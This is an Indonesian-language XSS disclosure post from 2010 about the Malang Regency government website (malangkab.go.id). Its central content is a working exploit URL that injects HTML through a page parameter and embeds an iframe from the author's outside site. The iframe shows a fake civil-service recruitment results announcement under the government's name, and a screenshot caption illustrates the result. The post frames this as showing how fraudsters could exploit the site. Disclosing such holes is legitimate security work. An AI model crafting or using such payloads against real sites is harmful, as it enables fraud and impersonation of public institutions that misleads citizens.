MALANGKAB.GO.ID Vulnerable to XSS


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Thursday, December 23rd, 2010
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


Terdapat citical XSS vulnerability pada website Pemerintah Kabupaten Malang. Celah tersebut memungkinkan penipu untuk melakukan penipuan online dengan memanfaatkan nama Pemerintah Kabupaten Malang dengan menyebarkan link menuju halaman website malangkab.go.id yang telah dinjeksi informasi palsu dengan XSS.

Exploit

//Injeksi Informasi Palsu Dengan XSS

http://malangkab.go.id/?page=90&kode=6&ktg=PENGUMUMAN%20PALSU%20HASIL%20TES%20PENERIMAAN%20CPNS%202010%3C/h3%3E%3Ciframe%20frameborder=%220%22%20scrolling=%22no%22%20width=%22630%22%20height=%22660%22%20src=%22http://spyrozone.net/playground/xss/malangkab.go.id.html%22%3E%3C/iframe%3E%3Ch3%20class=%22judulcob%22%3EOther%20Links

Screenshot

{image: Contoh Hasil Injeksi Informasi Palsu Pada Web Pemerintah Kabupaten Malang}

Contoh Hasil Injeksi Informasi Palsu Pada Web Pemerintah Kabupaten Malang


//E.O.F